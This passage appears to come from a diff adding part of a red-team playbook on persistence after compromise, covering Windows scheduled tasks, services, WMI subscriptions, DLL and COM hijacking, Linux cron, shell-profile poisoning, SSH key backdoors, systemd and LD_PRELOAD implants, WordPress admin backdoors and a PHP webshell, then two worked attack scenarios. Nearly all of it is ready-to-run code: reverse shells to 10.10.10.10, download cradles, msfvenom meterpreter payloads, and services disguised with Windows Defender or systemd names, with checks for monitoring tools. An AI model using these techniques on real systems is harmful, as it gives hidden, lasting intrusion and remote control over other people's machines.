+
```
|
|
253
|
+
|
|
254
|
+
#### 5.1.3 Scheduled Tasks (INTERMEDIATE)
|
|
255
|
+
|
|
256
|
+
```cmd
|
|
257
|
+
:: Basic user-context scheduled task
|
|
258
|
+
schtasks /create /tn "Microsoft\Windows\UpdateCheck" ^
|
|
259
|
+
/tr "C:\Users\Public\svchost32.exe" ^
|
|
260
|
+
/sc ONLOGON /ru %USERNAME% /f
|
|
261
|
+
|
|
262
|
+
:: Run at startup as SYSTEM (admin required)
|
|
263
|
+
schtasks /create /tn "Microsoft\Windows\WinDefend\SecurityScan" ^
|
|
264
|
+
/tr "C:\Windows\Temp\payload.exe" ^
|
|
265
|
+
/sc ONSTART /ru SYSTEM /rl HIGHEST /f
|
|
266
|
+
|
|
267
|
+
:: Run on schedule (every 4 hours)
|
|
268
|
+
schtasks /create /tn "Microsoft\Windows\UpdateOrchestrator\ScanTask" ^
|
|
269
|
+
/tr "powershell.exe -WindowStyle hidden -EncodedCommand <BASE64>" ^
|
|
270
|
+
/sc HOURLY /mo 4 /ru SYSTEM /f
|
|
271
|
+
|
|
272
|
+
:: Verify
|
|
273
|
+
schtasks /query /tn "Microsoft\Windows\UpdateCheck" /fo LIST
|
|
274
|
+
|
|
275
|
+
:: Delete
|
|
276
|
+
schtasks /delete /tn "Microsoft\Windows\UpdateCheck" /f
|
|
277
|
+
schtasks /delete /tn "Microsoft\Windows\WinDefend\SecurityScan" /f
|
|
278
|
+
schtasks /delete /tn "Microsoft\Windows\UpdateOrchestrator\ScanTask" /f
|
|
279
|
+
```
|
|
280
|
+
|
|
281
|
+
**Encode payload for schtasks:**
|
|
282
|
+
```bash
|
|
283
|
+
# On Kali — encode PowerShell download cradle
|
|
284
|
+
PAYLOAD='IEX(New-Object Net.WebClient).DownloadString("http://10.10.10.10/shell.ps1")'
|
|
285
|
+
echo -n "$PAYLOAD" | iconv -t UTF-16LE | base64 -w0
|
|
286
|
+
```
|
|
287
|
+
|
|
288
|
+
**XML-based scheduled task (harder to spot in schtasks /query):**
|
|
289
|
+
```powershell
|
|
290
|
+
# Create XML task definition
|
|
291
|
+
$xml = @"
|
|
292
|
+
<?xml version="1.0" encoding="UTF-16"?>
|
|
293
|
+
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
|
|
294
|
+
<Triggers>
|
|
295
|
+
<LogonTrigger><Enabled>true</Enabled></LogonTrigger>
|
|
296
|
+
</Triggers>
|
|
297
|
+
<Actions Context="Author">
|
|
298
|
+
<Exec>
|
|
299
|
+
<Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
|
|
300
|
+
<Arguments>-WindowStyle Hidden -EncodedCommand AAAA...</Arguments>
|
|
301
|
+
</Exec>
|
|
302
|
+
</Actions>
|
|
303
|
+
<Settings><Hidden>true</Hidden></Settings>
|
|
304
|
+
</Task>
|
|
305
|
+
"@
|
|
306
|
+
$xml | Out-File C:\Windows\Temp\task.xml -Encoding Unicode
|
|
307
|
+
schtasks /create /tn "Microsoft\Windows\CertificateServicesClient\AuthTask" /xml C:\Windows\Temp\task.xml /f
|
|
308
|
+
Remove-Item C:\Windows\Temp\task.xml
|
|
309
|
+
```
|
|
310
|
+
|
|
311
|
+
#### 5.1.4 Windows Service (INTERMEDIATE/ADVANCED)
|
|
312
|
+
|
|
313
|
+
```cmd
|
|
314
|
+
:: Install a service (admin required)
|
|
315
|
+
sc create "WindowsDefenderUpdate" ^
|
|
316
|
+
binPath= "C:\Windows\Temp\payload.exe" ^
|
|
317
|
+
start= auto ^
|
|
318
|
+
DisplayName= "Windows Defender Update"
|
|
319
|
+
|
|
320
|
+
:: Set description to blend in
|
|
321
|
+
sc description "WindowsDefenderUpdate" "Provides real-time protection updates for Windows Defender."
|
|
322
|
+
|
|
323
|
+
:: Start the service
|
|
324
|
+
sc start "WindowsDefenderUpdate"
|
|
325
|
+
|
|
326
|
+
:: Verify
|
|
327
|
+
sc query "WindowsDefenderUpdate"
|
|
328
|
+
|
|
329
|
+
:: Cleanup
|
|
330
|
+
sc stop "WindowsDefenderUpdate"
|
|
331
|
+
sc delete "WindowsDefenderUpdate"
|
|
332
|
+
```
|
|
333
|
+
|
|
334
|
+
**From Kali using impacket-services:**
|
|
335
|
+
```bash
|
|
336
|
+
impacket-services domain.local/admin:Password123@192.168.1.100 create \
|
|
337
|
+
-name WindowsDefenderUpdate \
|
|
338
|
+
-display "Windows Defender Update" \
|
|
339
|
+
-path "C:\\Windows\\Temp\\payload.exe"
|
|
340
|
+
|
|
341
|
+
impacket-services domain.local/admin:Password123@192.168.1.100 start \
|
|
342
|
+
-name WindowsDefenderUpdate
|
|
343
|
+
```
|
|
344
|
+
|
|
345
|
+
#### 5.1.5 WMI Event Subscriptions (ADVANCED/EXPERT)
|
|
346
|
+
|
|
347
|
+
```powershell
|
|
348
|
+
# Three WMI objects needed: Filter, Consumer, Binding
|
|
349
|
+
|
|
350
|
+
# 1. Event Filter — trigger on system startup
|
|
351
|
+
$filterArgs = @{
|
|
352
|
+
Name = "WindowsEventFilter"
|
|
353
|
+
EventNamespace = "root\cimv2"
|
|
354
|
+
QueryLanguage = "WQL"
|
|
355
|
+
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 120 AND TargetInstance.SystemUpTime < 180"
|
|
356
|
+
}
|
|
357
|
+
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs
|
|
358
|
+
|
|
359
|
+
# 2. Event Consumer — CommandLineEventConsumer
|
|
360
|
+
$consumerArgs = @{
|
|
361
|
+
Name = "WindowsEventConsumer"
|
|
362
|
+
CommandLineTemplate = "C:\Windows\Temp\payload.exe"
|
|
363
|
+
}
|
|
364
|
+
$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $consumerArgs
|
|
365
|
+
|
|
366
|
+
# 3. Binding — link filter to consumer
|
|
367
|
+
$bindingArgs = @{
|
|
368
|
+
Filter = $filter
|
|
369
|
+
Consumer = $consumer
|
|
370
|
+
}
|
|
371
|
+
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $bindingArgs
|
|
372
|
+
|
|
373
|
+
# Verify
|
|
374
|
+
Get-WMIObject -Namespace root\subscription -Class __EventFilter
|
|
375
|
+
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer
|
|
376
|
+
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding
|
|
377
|
+
|
|
378
|
+
# Cleanup
|
|
379
|
+
Get-WMIObject -Namespace root\subscription -Class __EventFilter | Where-Object Name -eq "WindowsEventFilter" | Remove-WmiObject
|
|
380
|
+
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer | Where-Object Name -eq "WindowsEventConsumer" | Remove-WmiObject
|
|
381
|
+
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object { $_.Filter -match "WindowsEventFilter" } | Remove-WmiObject
|
|
382
|
+
```
|
|
383
|
+
|
|
384
|
+
**From Kali using SharpWMI:**
|
|
385
|
+
```bash
|
|
386
|
+
# Transfer SharpWMI.exe to target, then run via meterpreter/shell
|
|
387
|
+
SharpWMI.exe action=query query="SELECT * FROM __EventFilter" namespace="root\\subscription"
|
|
388
|
+
```
|
|
389
|
+
|
|
390
|
+
#### 5.1.6 DLL Hijacking (ADVANCED)
|
|
391
|
+
|
|
392
|
+
```bash
|
|
393
|
+
# Step 1: Find writable directories in PATH that are searched before System32
|
|
394
|
+
# On target (PowerShell):
|
|
395
|
+
$env:PATH -split ";" | ForEach-Object { if (Test-Path $_) { $acl = Get-Acl $_; $acl.Access | Where-Object { $_.FileSystemRights -match "Write" -and $_.IdentityReference -match $env:USERNAME } } }
|
|
396
|
+
|
|
397
|
+
# Step 2: Identify applications with missing DLL dependencies
|
|
398
|
+
# Use Procmon (Sysinternals) filter: Result = NAME NOT FOUND, Path ends in .dll
|
|
399
|
+
# Or use: https://github.com/wietze/windows-dll-hijacking
|
|
400
|
+
|
|
401
|
+
# Step 3: On Kali — generate hijack DLL
|
|
402
|
+
msfvenom -p windows/x64/meterpreter/reverse_https \
|
|
403
|
+
LHOST=10.10.10.10 LPORT=443 \
|
|
404
|
+
-f dll -o /tmp/version.dll
|
|
405
|
+
|
|
406
|
+
# Step 4: Host and transfer
|
|
407
|
+
python3 -m http.server 8080 &
|
|
408
|
+
# On target:
|
|
409
|
+
# certutil -urlcache -split -f http://10.10.10.10:8080/version.dll C:\Path\To\App\version.dll
|
|
410
|
+
|
|
411
|
+
# Common DLL hijack targets:
|
|
412
|
+
# - C:\Python27\python27.dll (writable python dir)
|
|
413
|
+
# - Applications in user-writable directories
|
|
414
|
+
# - Services loading DLLs from non-system paths
|
|
415
|
+
```
|
|
416
|
+
|
|
417
|
+
#### 5.1.7 COM Hijacking (ADVANCED)
|
|
418
|
+
|
|
419
|
+
```powershell
|
|
420
|
+
# Find COM objects that are registered in HKLM but not HKCU
|
|
421
|
+
# (User can override HKCU without admin)
|
|
422
|
+
|
|
423
|
+
# Step 1: List machine COM objects
|
|
424
|
+
$hklm_clsids = Get-ChildItem "HKLM:\Software\Classes\CLSID" | Select-Object -ExpandProperty PSChildName
|
|
425
|
+
|
|
426
|
+
# Step 2: Check which ones have InProcServer32 pointing to non-system paths or missing
|
|
427
|
+
# (manual review or use COMHijackToolkit)
|
|
428
|
+
|
|
429
|
+
# Step 3: Register the COM object in HKCU
|
|
430
|
+
$clsid = "{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}" # target CLSID
|
|
431
|
+
New-Item -Path "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32" -Force
|
|
432
|
+
Set-ItemProperty -Path "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32" `
|
|
433
|
+
-Name "(Default)" -Value "C:\Users\Public\payload.dll"
|
|
434
|
+
Set-ItemProperty -Path "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32" `
|
|
435
|
+
-Name "ThreadingModel" -Value "Apartment"
|
|
436
|
+
|
|
437
|
+
# Common hijackable CLSIDs (varies by Windows version):
|
|
438
|
+
# {B31118B2-1F49-48E5-B6F5-BC21CAEC56FB} — Windows Script Host
|
|
439
|
+
# Research target-specific CLSIDs using procmon
|
|
440
|
+
|
|
441
|
+
# Cleanup
|
|
442
|
+
Remove-Item -Path "HKCU:\Software\Classes\CLSID\$clsid" -Recurse -Force
|
|
443
|
+
```
|
|
444
|
+
|
|
445
|
+
**Tools:**
|
|
446
|
+
```bash
|
|
447
|
+
# COMHijackToolkit — enumerate hijackable COM objects
|
|
448
|
+
# https://github.com/dr4k0nia/COMHijackToolkit
|
|
449
|
+
wget https://github.com/dr4k0nia/COMHijackToolkit/releases/latest/download/COMHijackToolkit.exe -O /opt/COMHijackToolkit.exe
|
|
450
|
+
```
|
|
451
|
+
|
|
452
|
+
---
|
|
453
|
+
|
|
454
|
+
### 5.2 Linux Persistence
|
|
455
|
+
|
|
456
|
+
#### 5.2.1 Cron Jobs (BEGINNER/INTERMEDIATE)
|
|
457
|
+
|
|
458
|
+
```bash
|
|
459
|
+
# User cron — no sudo needed
|
|
460
|
+
crontab -e
|
|
461
|
+
|
|
462
|
+
# Add entry (reverse shell every 5 minutes):
|
|
463
|
+
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' 2>/dev/null
|
|
464
|
+
|
|
465
|
+
# Or add via crontab -l redirect (non-interactive):
|
|
466
|
+
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' 2>/dev/null") | crontab -
|
|
467
|
+
|
|
468
|
+
# System-wide cron (root required):
|
|
469
|
+
echo "*/5 * * * * root /usr/local/bin/.sysupdate" >> /etc/crontab
|
|
470
|
+
|
|
471
|
+
# Drop script to /etc/cron.d/ (root):
|
|
472
|
+
cat > /etc/cron.d/sysupdate << 'EOF'
|
|
473
|
+
*/5 * * * * root /usr/local/bin/.sysupdate
|
|
474
|
+
EOF
|
|
475
|
+
chmod 644 /etc/cron.d/sysupdate
|
|
476
|
+
|
|
477
|
+
# Verify
|
|
478
|
+
crontab -l
|
|
479
|
+
cat /etc/crontab
|
|
480
|
+
ls /etc/cron.d/
|
|
481
|
+
|
|
482
|
+
# Cleanup
|
|
483
|
+
crontab -r
|
|
484
|
+
rm /etc/cron.d/sysupdate
|
|
485
|
+
rm /etc/crontab_entry # if appended
|
|
486
|
+
```
|
|
487
|
+
|
|
488
|
+
#### 5.2.2 Shell Profile Poisoning (BEGINNER)
|
|
489
|
+
|
|
490
|
+
```bash
|
|
491
|
+
# Poison ~/.bashrc (runs on each interactive bash shell)
|
|
492
|
+
echo 'nohup bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> ~/.bashrc
|
|
493
|
+
|
|
494
|
+
# Poison ~/.bash_profile (runs on login shells)
|
|
495
|
+
echo 'nohup bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> ~/.bash_profile
|
|
496
|
+
|
|
497
|
+
# Poison ~/.profile (runs on login — sh/bash)
|
|
498
|
+
echo 'nohup bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> ~/.profile
|
|
499
|
+
|
|
500
|
+
# Stealthier: alias a common command
|
|
501
|
+
echo "alias ls='ls --color=auto; nohup bash -c \"bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\" &>/dev/null &'" >> ~/.bashrc
|
|
502
|
+
|
|
503
|
+
# System-wide (root): /etc/bash.bashrc or /etc/profile
|
|
504
|
+
echo 'nohup bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> /etc/bash.bashrc
|
|
505
|
+
|
|
506
|
+
# Cleanup
|
|
507
|
+
# Edit the file and remove the added lines
|
|
508
|
+
sed -i '/10\.10\.10\.10/d' ~/.bashrc ~/.bash_profile ~/.profile
|
|
509
|
+
```
|
|
510
|
+
|
|
511
|
+
#### 5.2.3 SSH Authorized Keys Backdoor (INTERMEDIATE)
|
|
512
|
+
|
|
513
|
+
```bash
|
|
514
|
+
# Step 1: Generate attacker SSH key pair (on Kali)
|
|
515
|
+
ssh-keygen -t ed25519 -C "maintenance@corp.com" -f /tmp/backdoor_key -N ""
|
|
516
|
+
cat /tmp/backdoor_key.pub
|
|
517
|
+
|
|
518
|
+
# Step 2: On target — append to authorized_keys
|
|
519
|
+
mkdir -p ~/.ssh
|
|
520
|
+
chmod 700 ~/.ssh
|
|
521
|
+
echo "ssh-ed25519 AAAA...PUBKEY... maintenance@corp.com" >> ~/.ssh/authorized_keys
|
|
522
|
+
chmod 600 ~/.ssh/authorized_keys
|
|
523
|
+
|
|
524
|
+
# Step 3: Add no-agent restriction options for stealth (optional)
|
|
525
|
+
echo 'command="/bin/bash",no-port-forwarding,no-X11-forwarding,no-agent-forwarding ssh-ed25519 AAAA...' >> ~/.ssh/authorized_keys
|
|
526
|
+
|
|
527
|
+
# Step 4: Verify connectivity from Kali
|
|
528
|
+
ssh -i /tmp/backdoor_key user@target_ip
|
|
529
|
+
|
|
530
|
+
# Root backdoor (if root access):
|
|
531
|
+
mkdir -p /root/.ssh
|
|
532
|
+
echo "ssh-ed25519 AAAA...PUBKEY..." >> /root/.ssh/authorized_keys
|
|
533
|
+
chmod 600 /root/.ssh/authorized_keys
|
|
534
|
+
|
|
535
|
+
# Cleanup
|
|
536
|
+
sed -i '/maintenance@corp.com/d' ~/.ssh/authorized_keys
|
|
537
|
+
# Or remove specific key by fingerprint
|
|
538
|
+
```
|
|
539
|
+
|
|
540
|
+
#### 5.2.4 Systemd Service (INTERMEDIATE/ADVANCED)
|
|
541
|
+
|
|
542
|
+
```bash
|
|
543
|
+
# User-level systemd service (no root needed)
|
|
544
|
+
mkdir -p ~/.config/systemd/user/
|
|
545
|
+
|
|
546
|
+
cat > ~/.config/systemd/user/dbus-update.service << 'EOF'
|
|
547
|
+
[Unit]
|
|
548
|
+
Description=D-Bus System Update Service
|
|
549
|
+
After=default.target
|
|
550
|
+
|
|
551
|
+
[Service]
|
|
552
|
+
Type=simple
|
|
553
|
+
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
|
|
554
|
+
Restart=always
|
|
555
|
+
RestartSec=30
|
|
556
|
+
|
|
557
|
+
[Install]
|
|
558
|
+
WantedBy=default.target
|
|
559
|
+
EOF
|
|
560
|
+
|
|
561
|
+
systemctl --user enable dbus-update.service
|
|
562
|
+
systemctl --user start dbus-update.service
|
|
563
|
+
systemctl --user status dbus-update.service
|
|
564
|
+
|
|
565
|
+
# System-level service (root required)
|
|
566
|
+
cat > /etc/systemd/system/systemd-network-update.service << 'EOF'
|
|
567
|
+
[Unit]
|
|
568
|
+
Description=Network Configuration Update Service
|
|
569
|
+
After=network.target
|
|
570
|
+
|
|
571
|
+
[Service]
|
|
572
|
+
Type=simple
|
|
573
|
+
User=root
|
|
574
|
+
ExecStart=/usr/local/bin/.sysupdate
|
|
575
|
+
Restart=always
|
|
576
|
+
RestartSec=60
|
|
577
|
+
|
|
578
|
+
[Install]
|
|
579
|
+
WantedBy=multi-user.target
|
|
580
|
+
EOF
|
|
581
|
+
|
|
582
|
+
# Create the payload script
|
|
583
|
+
cat > /usr/local/bin/.sysupdate << 'EOF'
|
|
584
|
+
#!/bin/bash
|
|
585
|
+
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
|
|
586
|
+
EOF
|
|
587
|
+
chmod +x /usr/local/bin/.sysupdate
|
|
588
|
+
|
|
589
|
+
systemctl daemon-reload
|
|
590
|
+
systemctl enable systemd-network-update.service
|
|
591
|
+
systemctl start systemd-network-update.service
|
|
592
|
+
|
|
593
|
+
# Verify
|
|
594
|
+
systemctl status systemd-network-update.service
|
|
595
|
+
|
|
596
|
+
# Cleanup
|
|
597
|
+
systemctl stop systemd-network-update.service
|
|
598
|
+
systemctl disable systemd-network-update.service
|
|
599
|
+
rm /etc/systemd/system/systemd-network-update.service
|
|
600
|
+
rm /usr/local/bin/.sysupdate
|
|
601
|
+
systemctl daemon-reload
|
|
602
|
+
|
|
603
|
+
# User service cleanup
|
|
604
|
+
systemctl --user stop dbus-update.service
|
|
605
|
+
systemctl --user disable dbus-update.service
|
|
606
|
+
rm ~/.config/systemd/user/dbus-update.service
|
|
607
|
+
systemctl --user daemon-reload
|
|
608
|
+
```
|
|
609
|
+
|
|
610
|
+
#### 5.2.5 LD_PRELOAD Persistence (ADVANCED/EXPERT)
|
|
611
|
+
|
|
612
|
+
```bash
|
|
613
|
+
# Step 1: Create malicious shared library on Kali
|
|
614
|
+
cat > /tmp/persist.c << 'EOF'
|
|
615
|
+
#include <stdio.h>
|
|
616
|
+
#include <stdlib.h>
|
|
617
|
+
#include <unistd.h>
|
|
618
|
+
|
|
619
|
+
__attribute__((constructor))
|
|
620
|
+
void init() {
|
|
621
|
+
// Fork to avoid blocking the legitimate process
|
|
622
|
+
if (fork() == 0) {
|
|
623
|
+
setsid();
|
|
624
|
+
// Simple reverse shell
|
|
625
|
+
char *cmd = "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1";
|
|
626
|
+
system(cmd);
|
|
627
|
+
_exit(0);
|
|
628
|
+
}
|
|
629
|
+
}
|
|
630
|
+
EOF
|
|
631
|
+
|
|
632
|
+
gcc -shared -fPIC -o /tmp/libsystem.so /tmp/persist.c -nostartfiles
|
|
633
|
+
|
|
634
|
+
# Step 2: Deploy to target (transfer libsystem.so)
|
|
635
|
+
# Using existing shell access:
|
|
636
|
+
# scp /tmp/libsystem.so user@target:/usr/local/lib/.libsystem.so
|
|
637
|
+
|
|
638
|
+
# Step 3: Set LD_PRELOAD system-wide (root required)
|
|
639
|
+
echo "/usr/local/lib/.libsystem.so" > /etc/ld.so.preload
|
|
640
|
+
|
|
641
|
+
# OR per-user via ~/.bashrc:
|
|
642
|
+
echo "export LD_PRELOAD=/home/user/.local/lib/libsystem.so" >> ~/.bashrc
|
|
643
|
+
|
|
644
|
+
# Verify
|
|
645
|
+
cat /etc/ld.so.preload
|
|
646
|
+
|
|
647
|
+
# Cleanup
|
|
648
|
+
rm /etc/ld.so.preload
|
|
649
|
+
rm /usr/local/lib/.libsystem.so
|
|
650
|
+
```
|
|
651
|
+
|
|
652
|
+
---
|
|
653
|
+
|
|
654
|
+
### 5.3 Web Persistence — WordPress Application Password Backdoor
|
|
655
|
+
|
|
656
|
+
**Validated in Almentor engagement.**
|
|
657
|
+
|
|
658
|
+
```bash
|
|
659
|
+
# Step 1: Enumerate WordPress installation
|
|
660
|
+
# (assumes shell on web server or wp-cli access)
|
|
661
|
+
|
|
662
|
+
# Via wp-cli on target:
|
|
663
|
+
wp --path=/var/www/html user list
|
|
664
|
+
|
|
665
|
+
# Step 2: Create backdoor Application Password for admin user
|
|
666
|
+
# Application Passwords were added in WordPress 5.6+
|
|
667
|
+
wp --path=/var/www/html user application-password create admin "System Maintenance" --porcelain
|
|
668
|
+
# Output: xxxx xxxx xxxx xxxx xxxx xxxx (the application password)
|
|
669
|
+
|
|
670
|
+
# Step 3: Verify access via REST API (from Kali)
|
|
671
|
+
curl -s -u "admin:xxxx xxxx xxxx xxxx xxxx xxxx" \
|
|
672
|
+
https://target.com/wp-json/wp/v2/users/me | python3 -m json.tool
|
|
673
|
+
|
|
674
|
+
# Step 4: Use the backdoor for persistent admin access
|
|
675
|
+
# REST API — list users:
|
|
676
|
+
curl -s -u "admin:APP_PASSWORD" https://target.com/wp-json/wp/v2/users
|
|
677
|
+
|
|
678
|
+
# REST API — create new admin user:
|
|
679
|
+
curl -s -X POST -u "admin:APP_PASSWORD" \
|
|
680
|
+
https://target.com/wp-json/wp/v2/users \
|
|
681
|
+
-H "Content-Type: application/json" \
|
|
682
|
+
-d '{"username":"svc_update","password":"P@ssw0rd!2024","email":"svc@update.local","roles":["administrator"]}'
|
|
683
|
+
|
|
684
|
+
# Step 5: Alternative — direct DB backdoor (if MySQL access available)
|
|
685
|
+
mysql -u wp_user -p'db_password' wordpress_db -e "
|
|
686
|
+
INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
|
|
687
|
+
VALUES ('svc_monitor', MD5('P@ssw0rd!2024'), 'svc_monitor', 'svc@monitor.local', NOW(), 0, 'Service Monitor');
|
|
688
|
+
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
|
|
689
|
+
SELECT ID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM wp_users WHERE user_login='svc_monitor';
|
|
690
|
+
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
|
|
691
|
+
SELECT ID, 'wp_user_level', '10' FROM wp_users WHERE user_login='svc_monitor';
|
|
692
|
+
"
|
|
693
|
+
|
|
694
|
+
# Step 6: PHP webshell via theme editor (if filesystem write access)
|
|
695
|
+
wp --path=/var/www/html eval 'file_put_contents(get_template_directory() . "/maintenance.php", base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+"));'
|
|
696
|
+
# Webshell at: https://target.com/wp-content/themes/THEME/maintenance.php?cmd=id
|
|
697
|
+
|
|
698
|
+
# Cleanup
|
|
699
|
+
wp --path=/var/www/html user application-password delete admin --slug="system-maintenance"
|
|
700
|
+
wp --path=/var/www/html user delete svc_update --yes
|
|
701
|
+
# Remove webshell:
|
|
702
|
+
wp --path=/var/www/html eval 'unlink(get_template_directory() . "/maintenance.php");'
|
|
703
|
+
```
|
|
704
|
+
|
|
705
|
+
---
|
|
706
|
+
|
|
707
|
+
### 5.4 Payload Generation Reference
|
|
708
|
+
|
|
709
|
+
```bash
|
|
710
|
+
# Windows EXE — meterpreter/reverse_https (HTTPS avoids plain-text detection)
|
|
711
|
+
msfvenom -p windows/x64/meterpreter/reverse_https \
|
|
712
|
+
LHOST=10.10.10.10 LPORT=443 \
|
|
713
|
+
-e x64/xor_dynamic -i 5 \
|
|
714
|
+
-f exe -o /tmp/payload.exe
|
|
715
|
+
|
|
716
|
+
# Windows DLL — for DLL hijacking
|
|
717
|
+
msfvenom -p windows/x64/meterpreter/reverse_https \
|
|
718
|
+
LHOST=10.10.10.10 LPORT=443 \
|
|
719
|
+
-f dll -o /tmp/version.dll
|
|
720
|
+
|
|
721
|
+
# Windows PowerShell — encoded cradle
|
|
722
|
+
msfvenom -p windows/x64/meterpreter/reverse_https \
|
|
723
|
+
LHOST=10.10.10.10 LPORT=443 \
|
|
724
|
+
-f psh-cmd -o /tmp/payload.ps1
|
|
725
|
+
|
|
726
|
+
# Linux ELF
|
|
727
|
+
msfvenom -p linux/x64/meterpreter/reverse_tcp \
|
|
728
|
+
LHOST=10.10.10.10 LPORT=4444 \
|
|
729
|
+
-f elf -o /tmp/payload.elf
|
|
730
|
+
chmod +x /tmp/payload.elf
|
|
731
|
+
|
|
732
|
+
# Start multi-handler listener
|
|
733
|
+
msfconsole -x "use exploit/multi/handler; \
|
|
734
|
+
set payload windows/x64/meterpreter/reverse_https; \
|
|
735
|
+
set LHOST 0.0.0.0; set LPORT 443; \
|
|
736
|
+
set ExitOnSession false; run -j"
|
|
737
|
+
```
|
|
738
|
+
|
|
739
|
+
---
|
|
740
|
+
|
|
741
|
+
## 6. Real Attack Scenarios
|
|
742
|
+
|
|
743
|
+
### Scenario A — Windows Domain User to Durable Persistence (No Admin)
|
|
744
|
+
|
|
745
|
+
**Context:** Phishing gave us a foothold as a standard domain user. No admin. Credential access is possible but risky. We need to survive a reboot before lateral movement.
|
|
746
|
+
|
|
747
|
+
```
|
|
748
|
+
PHASE 1: Initial foothold (assume meterpreter shell)
|
|
749
|
+
-------------------------------------------------------
|
|
750
|
+
# Verify user context
|
|
751
|
+
meterpreter> getuid
|
|
752
|
+
# Server username: CORP\jsmith
|
|
753
|
+
|
|
754
|
+
# Check local admin
|
|
755
|
+
meterpreter> run post/windows/gather/local_admin_search_enum
|
|
756
|
+
|
|
757
|
+
# Not admin — proceed with user-level persistence
|
|
758
|
+
|
|
759
|
+
PHASE 2: Upload payload to blend-in location
|
|
760
|
+
-------------------------------------------------------
|
|
761
|
+
meterpreter> cd C:\\Users\\jsmith\\AppData\\Local\\Microsoft\\
|
|
762
|
+
meterpreter> mkdir WindowsUpdate
|
|
763
|
+
meterpreter> upload /tmp/payload.exe "C:\\Users\\jsmith\\AppData\\Local\\Microsoft\\WindowsUpdate\\svchost.exe"
|
|
764
|
+
|
|
765
|
+
PHASE 3: HKCU Registry Run Key
|
|
766
|
+
-------------------------------------------------------
|
|
767
|
+
meterpreter> shell
|
|
768
|
+
C:\> reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ^
|
|
769
|
+
/v "WindowsUpdate" /t REG_SZ ^
|
|
770
|
+
/d "C:\Users\jsmith\AppData\Local\Microsoft\WindowsUpdate\svchost.exe" /f
|
|
771
|
+
|
|
772
|
+
PHASE 4: HKCU Scheduled Task (second channel)
|
|
773
|
+
-------------------------------------------------------
|
|
774
|
+
C:\> schtasks /create /tn "Microsoft\Windows\UpdateCheck" ^
|
|
775
|
+
/tr "C:\Users\jsmith\AppData\Local\Microsoft\WindowsUpdate\svchost.exe" ^
|
|
776
|
+
/sc ONLOGON /ru CORP\jsmith /f
|
|
777
|
+
|
|
778
|
+
PHASE 5: COM Hijacking (third channel — no file needed if in-memory DLL)
|
|
779
|
+
-------------------------------------------------------
|
|
780
|
+
# Research hijackable CLSIDs for installed apps on this host
|
|
781
|
+
# Register DLL in HKCU COM path
|
|
782
|
+
|
|
783
|
+
PHASE 6: Verify
|
|
784
|
+
-------------------------------------------------------
|
|
785
|
+
# Simulate logon trigger — logout/login or:
|
|
786
|
+
C:\> schtasks /run /tn "Microsoft\Windows\UpdateCheck"
|
|
787
|
+
# Catch callback on Kali listener
|
|
788
|
+
|
|
789
|
+
PHASE 7: Document
|
|
790
|
+
-------------------------------------------------------
|
|
791
|
+
# Screenshot reg query output
|
|
792
|
+
# Screenshot schtasks /query output
|
|
793
|
+
# Note artefact paths and hashes
|
|
794
|
+
```
|
|
795
|
+
|
|
796
|
+
---
|
|
797
|
+
|
|
798
|
+
### Scenario B — Linux Root to Stealth Multi-Layer Persistence
|
|
799
|
+
|
|
800
|
+
**Context:** Exploited a vulnerable service. Root on Ubuntu 22.04 LTS. SOC is present. Need maximum durable access.
|
|
801
|
+
|
|
802
|
+
```
|
|
803
|
+
PHASE 1: Assess environment
|
|
804
|
+
-------------------------------------------------------
|
|
805
|
+
id && whoami && hostname && uname -r
|
|
806
|
+
cat /etc/os-release
|
|
807
|
+
ps aux | grep -E "sysmon|auditd|osquery|falcon" # Check for monitoring
|
|
808
|
+
|
|
809
|
+
PHASE 2: Layer 1 — Legitimate-looking systemd service
|
|
810
|
+
-------------------------------------------------------
|
|
811
|
+
# Create binary that mimics a real service name
|
|
812
|
+
cp /tmp/payload.elf /usr/local/sbin/networkd-dispatcher
|
|
813
|
+
chmod 755 /usr/local/sbin/networkd-dispatcher
|
|
814
|
+
|
|
815
|
+
cat > /etc/systemd/system/networkd-dispatcher.service << 'EOF'
|
|
816
|
+
[Unit]
|
|
817
|
+
Description=Dispatcher daemon for systemd-networkd
|
|
818
|
+
After=network.target
|
|
819
|
+
|
|
820
|
+
[Service]
|
|
821
|
+
Type=simple
|
|
822
|
+
ExecStart=/usr/local/sbin/networkd-dispatcher
|
|
823
|
+
Restart=always
|
|
824
|
+
RestartSec=60
|
|
825
|
+
|
|
826
|
+
[Install]
|
|
827
|
+
WantedBy=multi-user.target
|
|
828
|
+
EOF
|
|
829
|
+
|
|
830
|
+
systemctl daemon-reload
|
|
831
